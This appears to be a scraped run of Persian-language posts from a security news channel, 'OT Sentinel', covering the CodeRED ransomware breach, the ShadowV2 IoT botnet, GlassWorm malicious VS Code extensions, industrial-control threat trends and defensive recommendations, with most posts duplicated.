مهاجمان ابتدا با نفوذ به حسابهای کاربری و سرویسهای مدیریتی، کنترل بخشهایی از محیط عملیاتی CodeRED را به دست آوردند. سپس با استخراج دادههای ذخیرهشده در سرورها، اطلاعات کاربران شامل نام، آدرس، ایمیل و شماره تلفن را سرقت کردند. این الگوی حمله نشاندهنده استفاده از ترکیبی از مهندسی اجتماعی، سوءاستفاده از اعتبارنامهها و ضعفهای امنیتی در لایه احراز هویت است.
پس از عدم پرداخت باج، گروه INC Ransom مسئولیت حمله را پذیرفت و اعلام کرد دادههای سرقتشده را منتشر یا برای فروش قرار داده است. این اقدام خدمات هشدار اضطراری را مختل کرد و امنیت اطلاعات شخصی میلیونها کاربر را در معرض خطر قرار داد.
سامانه CodeRED، یکی از مهمترین زیرساختهای اطلاعرسانی فوری در آمریکا، اخیراً هدف یک حمله سایبری قرار گرفت که منجر به اختلال در ارسال هشدارهای حیاتی برای شهرها، نهادهای امنیتی و مدیریت بحران شد. در این رخداد، مهاجمان با بهرهگیری از یک نقطهضعف در زیرساخت ارتباطی و سوءاستفاده از دسترسیهای غیرمجاز، موفق شدند به بخشی از سیستمهای داخلی نفوذ کنند.
مهاجمان ابتدا با نفوذ به حسابهای کاربری و سرویسهای مدیریتی، کنترل بخشهایی از محیط عملیاتی CodeRED را به دست آوردند. سپس با استخراج دادههای ذخیرهشده در سرورها، اطلاعات کاربران شامل نام، آدرس، ایمیل و شماره تلفن را سرقت کردند. این الگوی حمله نشاندهنده استفاده از ترکیبی از مهندسی اجتماعی، سوءاستفاده از اعتبارنامهها و ضعفهای امنیتی در لایه احراز هویت است.
پس از عدم پرداخت باج، گروه INC Ransom مسئولیت حمله را پذیرفت و اعلام کرد دادههای سرقتشده را منتشر یا برای فروش قرار داده است. این اقدام خدمات هشدار اضطراری را مختل کرد و امنیت اطلاعات شخصی میلیونها کاربر را در معرض خطر قرار داد.
👏1
هر بار آگهیهای شغلی بینالمللی را مرور میکنم، مخصوصاً آن پوزیشنهایی که برای یک پروژه کوتاهمدت چندین Role تخصصی تعریف کردهاند، یک نکته اساسی برایم پررنگ میشود:
در فضای ما، تعداد عنوانهای شغلی زیاد است…
ولی تعداد نقشهایی که واقعاً بر اساس چارچوبهای معتبر شکل گرفته باشند، انگشتشمار است.
در مدلهای جهانی، هر نقش ویژگیهای روشن دارد:
محدوده مسئولیت مشخص است
مهارتها استاندارد و قابل ارزیابیاند
جایگاه نقش با سطح بلوغ سازمان هماهنگ است
و وظایف بین افراد مختلف بهصورت منطقی توزیع میشود، نه اینکه همه چیز روی دوش یک نفر باشد
اما در اکوسیستم ما، گاهی با عنوانهایی مواجهیم که حتی در هیچ کاتالوگ بینالمللی وجود خارجی ندارند.
این موضوع فقط ضعف در فرآیند استخدام نیست؛ ریشه در یک نارسایی بنیادیتر دارد: طراحی غیراستاندارد ساختارهای امنیتی.
سؤال اصلی همینجاست:
چه مقدار از ساختار امنیت اطلاعات ما بر پایهی چارچوبهایی مثل
NIST, ISO 27001, MITRE, SANS Roles, DoD Cyber Workforce
طراحی شده؟
و چقدر آن بر اساس سلیقه، محدودیت منابع انسانی یا فشارهای کوتاهمدت شکل گرفته است؟
تا زمانی که:
نقشها علمی و مبتنی بر استاندارد تعریف نشوند
ساختار تیمها شفاف نباشد
و توقعات از افراد با واقعیت بازار و تخصص همخوانی نداشته باشد
امنیت سازمانی همچنان در سطح واکنشی باقی میماند.
این حرفها نه گلایه است و نه انتقاد از یک نهاد خاص؛
بلکه یک نگرانی برای کل زیستبوم امنیت.
کیفیت حرفهای اتفاقی بهوجود نمیآید؛
باید آن را طراحی کرد و ساخت.
در فضای ما، تعداد عنوانهای شغلی زیاد است…
ولی تعداد نقشهایی که واقعاً بر اساس چارچوبهای معتبر شکل گرفته باشند، انگشتشمار است.
در مدلهای جهانی، هر نقش ویژگیهای روشن دارد:
محدوده مسئولیت مشخص است
مهارتها استاندارد و قابل ارزیابیاند
جایگاه نقش با سطح بلوغ سازمان هماهنگ است
و وظایف بین افراد مختلف بهصورت منطقی توزیع میشود، نه اینکه همه چیز روی دوش یک نفر باشد
اما در اکوسیستم ما، گاهی با عنوانهایی مواجهیم که حتی در هیچ کاتالوگ بینالمللی وجود خارجی ندارند.
این موضوع فقط ضعف در فرآیند استخدام نیست؛ ریشه در یک نارسایی بنیادیتر دارد: طراحی غیراستاندارد ساختارهای امنیتی.
سؤال اصلی همینجاست:
چه مقدار از ساختار امنیت اطلاعات ما بر پایهی چارچوبهایی مثل
NIST, ISO 27001, MITRE, SANS Roles, DoD Cyber Workforce
طراحی شده؟
و چقدر آن بر اساس سلیقه، محدودیت منابع انسانی یا فشارهای کوتاهمدت شکل گرفته است؟
تا زمانی که:
نقشها علمی و مبتنی بر استاندارد تعریف نشوند
ساختار تیمها شفاف نباشد
و توقعات از افراد با واقعیت بازار و تخصص همخوانی نداشته باشد
امنیت سازمانی همچنان در سطح واکنشی باقی میماند.
این حرفها نه گلایه است و نه انتقاد از یک نهاد خاص؛
بلکه یک نگرانی برای کل زیستبوم امنیت.
کیفیت حرفهای اتفاقی بهوجود نمیآید؛
باید آن را طراحی کرد و ساخت.
❤1
سال 2025 نقطه انفجار تهدیدات صنعتی است، چون:
شدت حملات بیسابقه شده است.
حملات باجافزاری علیه OT ۸۷٪ رشد کرده و بیش از ۶۰٪ گروهها سراغ اهداف صنعتی رفتهاند. تولید با فاصله زیاد آسیبپذیرترین حوزه است.
بازیگران جدید و متخصص OT وارد صحنه شدهاند.
تهدیدات صنعتی دیگر محدود به دولتها نیست؛ گروههای تازهوارد هم توان نفوذ عمیق دارند.
بدافزارهای صنعتی واقعی و عملیاتی شدهاند.
از Fuxnet تا FrostyGoop که مستقیم Modbus TCP را هدف میگیرد؛ بدافزار ICS دیگر یک سناریوی تئوری نیست.
همگرایی خطرناک تهدیدات: دولتها + باجافزار + هکتیویستها.
این ترکیب، پیشبینیناپذیری و سرعت حملات را چند برابر کرده است.
ضعف بنیادی در سازمانها: ۴۵٪ هنوز Visibility کافی ندارند.
کنترل ترافیک، پروتکلها و تغییرات سیستمهای صنعتی همچنان نقطهضعف اصلی است.
پنج کنترل حیاتی که مسیر 2025 را میسازند:
Incident Response واقعیمحور برای ICS
معماری دفاعی قابل دفاع (Segmentation، محدودسازی EWS، حذف Exposure)
Visibility و DPI روی پروتکلهای صنعتی
دسترسی راهدور امن
مدیریت آسیبپذیری مبتنی بر ریسک، نه Patchکردن کور
شدت حملات بیسابقه شده است.
حملات باجافزاری علیه OT ۸۷٪ رشد کرده و بیش از ۶۰٪ گروهها سراغ اهداف صنعتی رفتهاند. تولید با فاصله زیاد آسیبپذیرترین حوزه است.
بازیگران جدید و متخصص OT وارد صحنه شدهاند.
تهدیدات صنعتی دیگر محدود به دولتها نیست؛ گروههای تازهوارد هم توان نفوذ عمیق دارند.
بدافزارهای صنعتی واقعی و عملیاتی شدهاند.
از Fuxnet تا FrostyGoop که مستقیم Modbus TCP را هدف میگیرد؛ بدافزار ICS دیگر یک سناریوی تئوری نیست.
همگرایی خطرناک تهدیدات: دولتها + باجافزار + هکتیویستها.
این ترکیب، پیشبینیناپذیری و سرعت حملات را چند برابر کرده است.
ضعف بنیادی در سازمانها: ۴۵٪ هنوز Visibility کافی ندارند.
کنترل ترافیک، پروتکلها و تغییرات سیستمهای صنعتی همچنان نقطهضعف اصلی است.
پنج کنترل حیاتی که مسیر 2025 را میسازند:
Incident Response واقعیمحور برای ICS
معماری دفاعی قابل دفاع (Segmentation، محدودسازی EWS، حذف Exposure)
Visibility و DPI روی پروتکلهای صنعتی
دسترسی راهدور امن
مدیریت آسیبپذیری مبتنی بر ریسک، نه Patchکردن کور
🧑💻OT Sentinel🧑💻
سال 2025 نقطه انفجار تهدیدات صنعتی است، چون: شدت حملات بیسابقه شده است. حملات باجافزاری علیه OT ۸۷٪ رشد کرده و بیش از ۶۰٪ گروهها سراغ اهداف صنعتی رفتهاند. تولید با فاصله زیاد آسیبپذیرترین حوزه است. بازیگران جدید و متخصص OT وارد صحنه شدهاند. تهدیدات…
جمعبندی:
در 2025، حمله به صنعت «یک احتمال» نیست؛ یک قطعیت زمانی است.
سازمانها با تهدیدات واقعی در حال اجرا مواجهاند—نه سناریوهای فرضی.
در 2025، حمله به صنعت «یک احتمال» نیست؛ یک قطعیت زمانی است.
سازمانها با تهدیدات واقعی در حال اجرا مواجهاند—نه سناریوهای فرضی.
اجافزار باتنت ShadowV2
ShadowV2بهعنوان یک باتنت/بدافزار مبتنی بر IoT شناسایی شده که در بازه قطعی گسترده سرویسهای ابری AWS بهعنوان «فرصتی برای آزمایش» مورد استفاده قرار گرفته است. این تهدید، هم دستگاههای خانگی (روتر، DVR، NAS و غیره) و هم زیرساختهای سازمانی را هدف قرار میدهد.
مهاجمان با بهرهگیری از آسیبپذیریهای شناختهشده یا پسمانده در دستگاههای IoT، به آنها نفوذ کرده و بارگذاری اولیه بدافزار (loader) را انجام میدهند.
پس از نفوذ موفق، بدافزار اصلی از سرور کنترل (C2) دانلود میشود و دستگاه آلوده به عضوی از شبکه زامبیها تبدیل میگردد.
این ارتش زامبی امکان اجرای حملات گسترده از نوع DDoS (بر بستر پروتکلهای UDP، TCP و HTTP) را فراهم میکند — هم بهصورت مستقیم و هم بهعنوان سرویس اجارهای برای مجرمان دیگر.
تعداد زیادی از دستگاههای IoT در سطح خانگی و تجاری دارای بهروزسانی منظم نیستند یا به حالت End-of-Life رسیدهاند؛ این دستگاهها بیشترین آسیبپذیری را دارند.
بسیاری از این دستگاهها در شبکه داخلی مشترک قرار دارند؛ بنابراین در صورت آلوده شدن، امکان گسترش تهدید به بخشهای حساستر شبکه وجود دارد.
ShadowV2بهعنوان یک باتنت/بدافزار مبتنی بر IoT شناسایی شده که در بازه قطعی گسترده سرویسهای ابری AWS بهعنوان «فرصتی برای آزمایش» مورد استفاده قرار گرفته است. این تهدید، هم دستگاههای خانگی (روتر، DVR، NAS و غیره) و هم زیرساختهای سازمانی را هدف قرار میدهد.
مهاجمان با بهرهگیری از آسیبپذیریهای شناختهشده یا پسمانده در دستگاههای IoT، به آنها نفوذ کرده و بارگذاری اولیه بدافزار (loader) را انجام میدهند.
پس از نفوذ موفق، بدافزار اصلی از سرور کنترل (C2) دانلود میشود و دستگاه آلوده به عضوی از شبکه زامبیها تبدیل میگردد.
این ارتش زامبی امکان اجرای حملات گسترده از نوع DDoS (بر بستر پروتکلهای UDP، TCP و HTTP) را فراهم میکند — هم بهصورت مستقیم و هم بهعنوان سرویس اجارهای برای مجرمان دیگر.
تعداد زیادی از دستگاههای IoT در سطح خانگی و تجاری دارای بهروزسانی منظم نیستند یا به حالت End-of-Life رسیدهاند؛ این دستگاهها بیشترین آسیبپذیری را دارند.
بسیاری از این دستگاهها در شبکه داخلی مشترک قرار دارند؛ بنابراین در صورت آلوده شدن، امکان گسترش تهدید به بخشهای حساستر شبکه وجود دارد.
بحرانی که بسیاری از سازمانها نادیده میگیرند
گزارشهای جدید نشان میدهد که بخش بزرگی از سازمانها با وجود اتکای گسترده به هوش مصنوعی، سرویسهای ابری و اتوماسیون، هنوز در مهمترین حوزه امنیتی خود دچار کمبود هستند: محافظت از هویتها. امروز هویتهای ماشینی و سرویسها دهها برابر بیشتر از کاربران انسانی شدهاند و اغلب بدون نظارت کافی، دسترسیهای حساس را در اختیار دارند.
این رشد بیرویه هویتها، همراه با ساختارهای جدا افتاده مدیریت دسترسی، شکافهای بزرگی ایجاد کرده که مهاجمان از آن سوءاستفاده میکنند. برای مقابله، سازمانها باید هویت را بهصورت یکپارچه — انسان، ماشین و عاملهای خودکار — مدیریت کنند، دسترسیهای حساس را تحت کنترل متمرکز قرار دهند و رویکرد «امن از روز اول» را در پروژهها و سیستمهای جدید اجرا کنند.
گزارشهای جدید نشان میدهد که بخش بزرگی از سازمانها با وجود اتکای گسترده به هوش مصنوعی، سرویسهای ابری و اتوماسیون، هنوز در مهمترین حوزه امنیتی خود دچار کمبود هستند: محافظت از هویتها. امروز هویتهای ماشینی و سرویسها دهها برابر بیشتر از کاربران انسانی شدهاند و اغلب بدون نظارت کافی، دسترسیهای حساس را در اختیار دارند.
این رشد بیرویه هویتها، همراه با ساختارهای جدا افتاده مدیریت دسترسی، شکافهای بزرگی ایجاد کرده که مهاجمان از آن سوءاستفاده میکنند. برای مقابله، سازمانها باید هویت را بهصورت یکپارچه — انسان، ماشین و عاملهای خودکار — مدیریت کنند، دسترسیهای حساس را تحت کنترل متمرکز قرار دهند و رویکرد «امن از روز اول» را در پروژهها و سیستمهای جدید اجرا کنند.
بدافزار GlassWorm در سومین موج حملات خود، با آلودهسازی افزونههای VS Code و نسخههای متنباز آن، محیط توسعه را هدف قرار داده است. مهاجمان افزونههای بهظاهر عادی را منتشر میکنند و پس از نصب، کد مخرب پنهانشده با تکنیکهای یونی کد نامرئی فعال میشود.
این بدافزار پس از اجرا اقدام به سرقت توکنها، رمزها و کلیدهای توسعه، ایجاد دسترسی راهدور و حرکت جانبی در شبکه میکند. GlassWorm همچنین با استفاده از حسابهای سرقتشده توسعهدهندگان، نسخههای آلوده جدید منتشر میکند و بهصورت زنجیرهای گسترش مییابد.
توصیهها: بازبینی افزونههای نصبشده، حذف موارد ناشناخته، چرخش اعتبارنامهها، محدودسازی نصب افزونهها در سازمان و پایش رفتار غیرعادی سیستم و شبکه.
این بدافزار پس از اجرا اقدام به سرقت توکنها، رمزها و کلیدهای توسعه، ایجاد دسترسی راهدور و حرکت جانبی در شبکه میکند. GlassWorm همچنین با استفاده از حسابهای سرقتشده توسعهدهندگان، نسخههای آلوده جدید منتشر میکند و بهصورت زنجیرهای گسترش مییابد.
توصیهها: بازبینی افزونههای نصبشده، حذف موارد ناشناخته، چرخش اعتبارنامهها، محدودسازی نصب افزونهها در سازمان و پایش رفتار غیرعادی سیستم و شبکه.
👍2
انتشار نسخه رسمی ۲۰۲۵ چیتشیت امنیت ICS/OT
🛡️✨ این سند نتیجهی ماهها تحلیل، بررسی تهدیدات نوظهور و تجربهی عملی در محیطهای صنعتی است.
در این نسخه، ۱۶ تهدید کلیدی سال ۲۰۲۵ همراه با مجموعهای از دفاعهای ترکیبی مبتنی بر فناوریهای کوانتومی و هوشمصنوعی ارائه شدهاند؛ راهکارهایی کاملاً کاربردی و قابلپیادهسازی در شبکههای OT/ICS، صنایع انرژی، نفتوگاز، تولید و سایر زیرساختهای حیاتی.
محتوای چیتشیت شامل موارد زیر است:
• تهدیدات USB، دستکاری firmware و حملات spoofing
• راهکارهای مقاوم در برابر تهدیدات کوانتومی (PQC)
• کاربردهای هوشمصنوعی در تشخیص ناهنجاری و محافظت از تجهیزات legacy
• تحلیل دفاعی در برابر بدافزارهای مولد و حملات مبتنی بر deepfake
• ساختار Zero-Trust ویژه محیطهای OT
• راهکارهای عملی برای بازیابی پس از حملات ransomware صنعتی
• و مجموعهای از قوانین CTL برای اعتبارسنجی رسمی معماری امنیتی
این نسخه از معدود منابعی است که بهصورت یکپارچه
Quantum Security و AI-driven Defense
را برای حوزهی امنیت صنعتی ترکیب میکند.
🛡️✨ این سند نتیجهی ماهها تحلیل، بررسی تهدیدات نوظهور و تجربهی عملی در محیطهای صنعتی است.
در این نسخه، ۱۶ تهدید کلیدی سال ۲۰۲۵ همراه با مجموعهای از دفاعهای ترکیبی مبتنی بر فناوریهای کوانتومی و هوشمصنوعی ارائه شدهاند؛ راهکارهایی کاملاً کاربردی و قابلپیادهسازی در شبکههای OT/ICS، صنایع انرژی، نفتوگاز، تولید و سایر زیرساختهای حیاتی.
محتوای چیتشیت شامل موارد زیر است:
• تهدیدات USB، دستکاری firmware و حملات spoofing
• راهکارهای مقاوم در برابر تهدیدات کوانتومی (PQC)
• کاربردهای هوشمصنوعی در تشخیص ناهنجاری و محافظت از تجهیزات legacy
• تحلیل دفاعی در برابر بدافزارهای مولد و حملات مبتنی بر deepfake
• ساختار Zero-Trust ویژه محیطهای OT
• راهکارهای عملی برای بازیابی پس از حملات ransomware صنعتی
• و مجموعهای از قوانین CTL برای اعتبارسنجی رسمی معماری امنیتی
این نسخه از معدود منابعی است که بهصورت یکپارچه
Quantum Security و AI-driven Defense
را برای حوزهی امنیت صنعتی ترکیب میکند.
❤2